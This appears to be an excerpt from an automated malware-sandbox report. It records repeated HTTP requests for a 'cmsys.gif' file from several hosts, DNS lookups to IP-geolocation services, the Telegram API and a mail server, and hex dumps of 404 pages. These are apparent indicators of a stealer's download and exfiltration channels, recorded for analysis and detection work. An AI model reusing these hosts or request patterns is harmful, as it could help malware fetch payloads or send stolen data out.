                    Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.zxq.netConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.zxq.netConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.zxq.netConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.zxq.netConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.zxq.netConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.zxq.netConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.zxq.netConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.zxq.netConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.zxq.netConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: vccmd01.googlecode.com
                    Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                    Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                    Source: global trafficDNS traffic detected: DNS query: vccmd02.googlecode.com
                    Source: global trafficDNS traffic detected: DNS query: vccmd03.googlecode.com
                    Source: global trafficDNS traffic detected: DNS query: vccmd01.t35.com
                    Source: global trafficDNS traffic detected: DNS query: vccmd01.zxq.net
                    Source: global trafficDNS traffic detected: DNS query: zxq.net
                    Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                    Source: global trafficDNS traffic detected: DNS query: mail.tlakovec.si
                    Source: global trafficDNS traffic detected: DNS query: 241.42.69.40.in-addr.arpa
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 29 Oct 2024 12:08:19 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:07:59 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:08:03 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:08:05 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:08:15 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
